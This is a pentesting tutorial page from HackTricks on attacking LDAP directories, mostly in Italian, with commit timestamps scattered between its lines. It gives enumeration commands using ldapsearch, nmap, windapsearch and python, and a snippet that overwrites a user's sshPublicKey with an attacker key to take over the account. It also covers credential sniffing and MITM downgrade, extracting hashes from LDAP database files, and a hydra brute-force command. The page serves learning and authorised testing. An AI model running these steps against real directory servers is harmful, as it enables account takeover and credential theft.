
392 lines
17 KiB
Raw Normal View History

# 389, 636, 3268, 3269 - Pentesting LDAP
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2024-01-03 11:42:55 +01:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
L'uso di **LDAP** (Lightweight Directory Access Protocol) è principalmente per localizzare varie entità come organizzazioni, individui e risorse come file e dispositivi all'interno di reti, sia pubbliche che private. Offre un approccio semplificato rispetto al suo predecessore, DAP, avendo un'impronta di codice più piccola.
Le directory LDAP sono strutturate per consentire la loro distribuzione su più server, con ogni server che ospita una versione **replicata** e **sincronizzata** della directory, chiamata Directory System Agent (DSA). La responsabilità per la gestione delle richieste è interamente a carico del server LDAP, che può comunicare con altri DSA secondo necessità per fornire una risposta unificata al richiedente.
L'organizzazione della directory LDAP assomiglia a una **gerarchia ad albero, che inizia con la directory radice in cima**. Questa si ramifica in paesi, che si dividono ulteriormente in organizzazioni, e poi in unità organizzative che rappresentano varie divisioni o dipartimenti, raggiungendo infine il livello delle singole entità, comprese sia le persone che le risorse condivise come file e stampanti.
**Porta predefinita:** 389 e 636(ldaps). Il Catalogo Globale (LDAP in ActiveDirectory) è disponibile per impostazione predefinita sulle porte 3268 e 3269 per LDAPS.
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
### LDAP Data Interchange Format
LDIF (LDAP Data Interchange Format) definisce il contenuto della directory come un insieme di record. Può anche rappresentare richieste di aggiornamento (Aggiungi, Modifica, Elimina, Rinomina).
dn: dc=local
dc: local
objectClass: dcObject
dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization
dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev
dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales
dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
mail: pepe@hacktricks.xyz
phone: 23627387495
* Le righe 1-3 definiscono il dominio di primo livello locale
* Le righe 5-8 definiscono il dominio di primo livello moneycorp (moneycorp.local)
2024-02-10 13:03:23 +00:00
* Le righe 10-16 definiscono 2 unità organizzative: dev e sales
* Le righe 18-26 creano un oggetto del dominio e assegnano attributi con valori
2024-02-10 13:03:23 +00:00
## Scrivere dati
Nota che se puoi modificare i valori potresti essere in grado di eseguire azioni davvero interessanti. Ad esempio, immagina che tu **possa cambiare le informazioni "sshPublicKey"** del tuo utente o di qualsiasi utente. È altamente probabile che se questo attributo esiste, allora **ssh sta leggendo le chiavi pubbliche da LDAP**. Se puoi modificare la chiave pubblica di un utente **sarai in grado di accedere come quell'utente anche se l'autenticazione tramite password non è abilitata in ssh**.
2024-02-05 03:29:11 +01:00
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
2022-10-05 21:51:12 +00:00
>>> connection.extend.standard.who_am_i()
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
## Sniff clear text credentials
Se LDAP viene utilizzato senza SSL, puoi **sniffare le credenziali in chiaro** nella rete.
2022-10-05 21:51:12 +00:00
Inoltre, puoi eseguire un attacco **MITM** nella rete **tra il server LDAP e il client.** Qui puoi effettuare un **Downgrade Attack** in modo che il client utilizzi le **credenziali in chiaro** per accedere.
2022-10-05 21:51:12 +00:00
**Se viene utilizzato SSL**, puoi provare a fare **MITM** come menzionato sopra, offrendo un **certificato falso**; se l'**utente lo accetta**, puoi effettuare un Downgrade del metodo di autenticazione e vedere di nuovo le credenziali.
2022-10-05 21:51:12 +00:00
## Anonymous Access
2022-10-05 21:51:12 +00:00
### Bypass TLS SNI check
Secondo [**questo writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/), semplicemente accedendo al server LDAP con un nome di dominio arbitrario (come company.com), è stato in grado di contattare il servizio LDAP ed estrarre informazioni come utente anonimo:
2022-10-05 21:51:12 +00:00
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
### LDAP anonymous binds
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) consentono a **attaccanti non autenticati** di recuperare informazioni dal dominio, come un elenco completo di utenti, gruppi, computer, attributi degli account utente e la politica delle password del dominio. Questa è una **configurazione legacy**, e a partire da Windows Server 2003, solo gli utenti autenticati possono avviare richieste LDAP.\
Tuttavia, gli amministratori potrebbero aver dovuto **configurare un'applicazione particolare per consentire i bind anonimi** e aver dato più accesso di quanto previsto, dando così agli utenti non autenticati accesso a tutti gli oggetti in AD.
2022-10-05 21:51:12 +00:00
## Valid Credentials
2022-10-05 21:51:12 +00:00
Se hai credenziali valide per accedere al server LDAP, puoi estrarre tutte le informazioni sull'Amministratore di Dominio utilizzando:
2022-10-05 21:51:12 +00:00
2022-10-05 00:11:28 +00:00
2024-02-10 13:03:23 +00:00
pip3 install ldapdomaindump
2022-10-05 21:51:12 +00:00
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
2022-10-05 00:11:28 +00:00
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
2022-10-04 23:49:59 +00:00
2024-02-10 13:03:23 +00:00
## Enumerazione
2022-10-05 21:51:12 +00:00
### Automatica
2022-10-04 23:49:59 +00:00
Utilizzando questo, sarai in grado di vedere le **informazioni pubbliche** (come il nome di dominio)**:**
2022-10-04 23:49:59 +00:00
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
2022-10-05 21:51:12 +00:00
### Python
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
2024-02-10 13:03:23 +00:00
<summary>Vedi l'enumerazione LDAP con python</summary>
2022-10-05 21:51:12 +00:00
Puoi provare a **enumerare un LDAP con o senza credenziali usando python**: `pip3 install ldap3`
2022-10-04 23:49:59 +00:00
2024-02-10 13:03:23 +00:00
Prima prova a **connetterti senza** credenziali:
2022-10-04 23:49:59 +00:00
>>> import ldap3
2022-10-05 21:51:12 +00:00
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
2022-10-04 23:49:59 +00:00
>>> connection.bind()
2022-10-05 21:51:12 +00:00
>>> server.info
2022-10-04 23:49:59 +00:00
Se la risposta è `True` come nell'esempio precedente, puoi ottenere alcuni **dati interessanti** del server LDAP (come il **contesto di denominazione** o il **nome di dominio**) da:
2022-10-05 21:51:12 +00:00
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
2024-02-10 13:03:23 +00:00
Naming contexts:
2022-10-05 21:51:12 +00:00
Una volta che hai il contesto di denominazione, puoi fare alcune query più interessanti. Questa semplice query dovrebbe mostrarti tutti gli oggetti nella directory:
2022-10-05 21:51:12 +00:00
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
>> connection.entries
O **dump** l'intero ldap:
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
>>> connection.entries
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
### windapsearch
2022-10-04 23:49:59 +00:00
[**Windapsearch**](https://github.com/ropnop/windapsearch) è uno script Python utile per **enumerare utenti, gruppi e computer da un dominio Windows** utilizzando query LDAP.
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
# Get computers
python3 windapsearch.py --dc-ip -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip -u john@domain.local -p password --privileged-users
2022-10-04 23:49:59 +00:00
2022-10-05 21:51:12 +00:00
### ldapsearch
Controlla le credenziali nulle o se le tue credenziali sono valide:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
2022-05-01 13:49:36 +01:00
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
2024-02-10 13:03:23 +00:00
tion a successful bind must be completed on the connection., data 0, v3839
Se trovi qualcosa che dice che il "_bind deve essere completato_" significa che le credenziali non sono corrette.
Puoi estrarre **tutto da un dominio** usando:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
2022-07-13 16:08:05 +02:00
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
Estrai **utenti**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
Estrai **computer**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
2024-02-10 13:03:23 +00:00
Estrai **le mie informazioni**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
2024-02-10 13:03:23 +00:00
Estrai **Domain Admins**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai **Domain Users**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
2024-02-10 13:03:23 +00:00
Estrai **Enterprise Admins**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai **Amministratori**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Estrai **Remote Desktop Group**:
2022-07-13 16:08:05 +02:00
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Per vedere se hai accesso a qualche password, puoi usare grep dopo aver eseguito una delle query:
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
Si prega di notare che le password che puoi trovare qui potrebbero non essere quelle reali...
2022-05-01 13:25:53 +00:00
#### pbis
Puoi scaricare **pbis** da qui: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) e di solito è installato in `/opt/pbis`.\
**Pbis** ti consente di ottenere facilmente informazioni di base:
2021-01-19 17:57:39 +00:00
#Read keytab file
./klist -k /etc/krb5.keytab
#Get known domains info
./lsa get-status
#Get basic metrics
./lsa get-metrics
#Get users
./lsa enum-users
#Get groups
./lsa enum-groups
#Get all kind of objects
./lsa enum-objects
#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
2021-01-06 00:15:17 +00:00
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
2021-01-06 00:15:17 +00:00
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
2024-02-10 13:03:23 +00:00
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
## Interfaccia Grafica
2022-05-01 13:25:53 +00:00
### Apache Directory
2020-09-13 20:20:14 +00:00
2024-02-10 13:03:23 +00:00
[**Scarica Apache Directory da qui**](https://directory.apache.org/studio/download/download-linux.html). Puoi trovare un [esempio di come utilizzare questo strumento qui](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).
2020-09-13 20:20:14 +00:00
2022-05-01 13:25:53 +00:00
### jxplorer
2020-09-13 20:20:14 +00:00
Puoi scaricare un'interfaccia grafica con il server LDAP qui: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
Per impostazione predefinita è installato in: _/opt/jxplorer_
![](<../.gitbook/assets/image (482).png>)
### Godap
Puoi accedervi in [https://github.com/Macmod/godap](https://github.com/Macmod/godap)
2024-02-10 13:03:23 +00:00
## Autenticazione tramite kerberos
Utilizzando `ldapsearch` puoi **autenticarti** contro **kerberos invece** di tramite **NTLM** utilizzando il parametro `-Y GSSAPI`
2022-05-01 13:25:53 +00:00
Se puoi accedere ai file in cui sono contenute le basi di dati (potrebbero trovarsi in _/var/lib/ldap_). Puoi estrarre gli hash utilizzando:
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
Puoi fornire a john l'hash della password (da '{SSHA}' a 'structural' senza aggiungere 'structural').
### File di Configurazione
2024-02-10 13:03:23 +00:00
* Generale
* containers.ldif
* ldap.cfg
* ldap.conf
* ldap.xml
* ldap-config.xml
* ldap-realm.xml
* slapd.conf
* IBM SecureWay V3 server
2024-02-10 13:03:23 +00:00
* V3.sas.oc
* Microsoft Active Directory server
2024-02-10 13:03:23 +00:00
* msadClassesAttrs.ldif
* Netscape Directory Server 4
2024-02-10 13:03:23 +00:00
* nsslapd.sas\_at.conf
* nsslapd.sas\_oc.conf
* OpenLDAP directory server
2024-02-10 13:03:23 +00:00
* slapd.sas\_at.conf
* slapd.sas\_oc.conf
* Sun ONE Directory Server 5.1
2024-02-10 13:03:23 +00:00
* 75sas.ldif
## HackTricks Comandi Automatici
2021-08-12 09:06:00 -04:00
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
2021-08-15 13:52:05 -04:00
2024-02-10 13:03:23 +00:00
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
2021-09-13 11:45:07 -04:00
2024-02-10 13:03:23 +00:00
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
2021-08-12 09:06:00 -04:00
{% hint style="success" %}
Impara e pratica il hacking su AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica il hacking su GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2022-04-28 16:01:33 +00:00
<summary>Supporta HackTricks</summary>
2024-01-03 11:42:55 +01:00
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.
2022-04-28 16:01:33 +00:00
{% endhint %}